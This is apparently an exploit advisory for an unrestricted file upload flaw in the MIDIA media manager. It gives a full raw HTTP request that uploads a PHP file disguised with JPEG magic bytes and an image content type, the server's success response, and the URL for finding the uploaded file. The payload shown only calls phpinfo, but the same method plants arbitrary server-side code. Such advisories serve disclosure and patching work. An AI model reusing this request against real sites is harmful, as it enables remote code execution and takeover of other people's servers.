# Exploit Title: MIDIA Unrestricted File Upload / Arbitrary File Upload # Description: - # Date: 02102024 # Exploit Author: Khunerable # Vendor Homepage: https://github.com/itskodinger/midia/tree/master # Tested on: Windows 11,Windows NT 10.0 ////////////////////////////////////////////////////////////////////////////////////////// POC : for see the list file and name of directory, example: example.com/midia/get/1?key=&directory_name=blog ////////////////////////////////////////////////////////////////////////////////////////// POST FOR UPLOAD : POST /midia/upload?directory_name=blog HTTP/2 Host: example.com Cookie: XSRF-TOKEN=eyJpdiI6IkppemZjRTk2eGxTeENIeGdNMXBGcnc9PSIsInZhbHVlIjoiYjFuOVBqcDRBVFBIck5HUEdXTXJMZEFaRERwbElYdGdmMzR0WXpXY3dMQkg5QlVzMVNwMmsrTElzeWc1SWlhZm9WS1cwblQyYXZWMFZDYmVGMnlXZlk3bmtxZ2dnc04rVFpUTkt4ckVmTzBDazFlbnJpTXJ3WHkyUDJib1krTWwiLCJtYWMiOiIxNTM5ZDZmZjUyOGZjZmVmZjZkZDM5YWNjZDUxMGU4YWJmMDYxNWI2ZTJjNGFlZDM0ZmVhODEzNmI2YjRiMGVlIiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:04:04 GMT; Max-Age=6048000; path=/; example_session=eyJpdiI6Im55citKcFA2MVcyNjQvbWRkdEJXelE9PSIsInZhbHVlIjoicmdZdXpsSVk5N29vVTFvYVVUYVZqUjREZzRNbVNjRWxlQndlMFpOb2RGUEdGanhPaW9CUlFSenpjVVg3UHNhSmNZY1Y4c0dVWi9aWnZkQWFvK3lhOGN4eUR0Vjh0ZjVEU0pWS0dxRkQ2TEhPNStqRFBTZXNPRmRWR2xGc3hVaUEiLCJtYWMiOiJkNGM4ODNhNmQxODU3NDE2ZDlkODEzZWQwN2FhZmEyNjY5MDIyMjBkZGUyNGFlYzllNmFlZWQ3N2RlZTA2MzJlIiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:04:04 GMT; Max-Age=6048000; path=/; httponly User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------2046057511352620401550882142 Cache-Control: no-cache X-Requested-With: XMLHttpRequest X-Csrf-Token: TOKEN FROM YOUR TARGET Content-Length: 25970 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 Te: trailers -----------------------------2046057511352620401550882142 Content-Disposition: form-data; name="file"; filename="dummy.php" Content-Type: image/jpeg ÿØÿà<?php phpinfo(); ?> -----------------------------2046057511352620401550882142-- ////////////////////////////////////////////////////////////////////////////////////////// THE RESPONSE : HTTP/2 200 OK Date: Wed, 02 Oct 2024 10:05:20 GMT Content-Type: application/json Set-Cookie: PHPSESSID=jhkv7osdakd7env44ttb1tn2hg; path=/ Set-Cookie: XSRF-TOKEN=eyJpdiI6IlM3WHloNW1mN0xHNlp3ekZmOVhGN1E9PSIsInZhbHVlIjoia1JEdGE5WWh1NWVmMlZqZWpyakVmZFIvVnFDODlGNmZJN2g1OFNkQnhxZ0c0ZWRUMHBieHBKd3FyS0NrVFhBSzV3anBJakZiS3RmZHBZanJBRW0ydTMzT1daeVYwM2VBN3FBUW9YRHZudE1kQitDNUlVWnpqbkV0NWQrTENlMUYiLCJtYWMiOiJlMWVhNmE2YTFiMmU4OGFlOTI0ODJkNWM2NDA1YTdhMmU5M2UzZjAyN2U3YjkxYmRhZmJkM2UwNTFlYzEwMTY2IiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:05:20 GMT; Max-Age=6048000; path=/ Set-Cookie: example_session=eyJpdiI6InBjRGRNODRxb2xVbVJtY1FSVHJwakE9PSIsInZhbHVlIjoiTkZmYTFRU0d2bEc0TGRNUDBHRFdnZkpONHdvZEtGYWcyd29nZTRmM0psb29Ka0xnV1QyVFk2eXppZ0dFTUd4UTVqdGVLMTFMWEhxU2Vqa2cvTVRnVHJjVGdLRk9pT05EQ0poNzZFNE1kQWJEZ3RoT1U0a0huRW54aWliNmVLVmIiLCJtYWMiOiI5YTQwYjVjZGRkM2QyN2QzNjEyNDZiMjEyNzM1YmE5NzEwYWQ5ODg3NWZmMzkxOTc3ODhhZDM2Y2FhNTA4OGU2IiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:05:20 GMT; Max-Age=6048000; path=/; httponly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: no-cache, private Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff Cf-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESYQOsUB3yx%2Bqe61NJ9P8kB9lCtae9k0g4ItrJcmU2PaXgZJpUHXbgevDkOOHZ6QdCq%2BKCir4QOuTBkX25XhWTvr7SKLWJ93Rl9C9H0Qop9zwh%2BilB2W2evHRu0HSptz7OQ%3D"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare Cf-Ray: 8cc3df974e5904b9-HKG {"success":"dummy.php"} ////////////////////////////////////////////////////////////////////////////////////////// THEN YOU CAN SEE YOUR FILE ON ( example.com/midia/get/1?key=&directory_name=blog )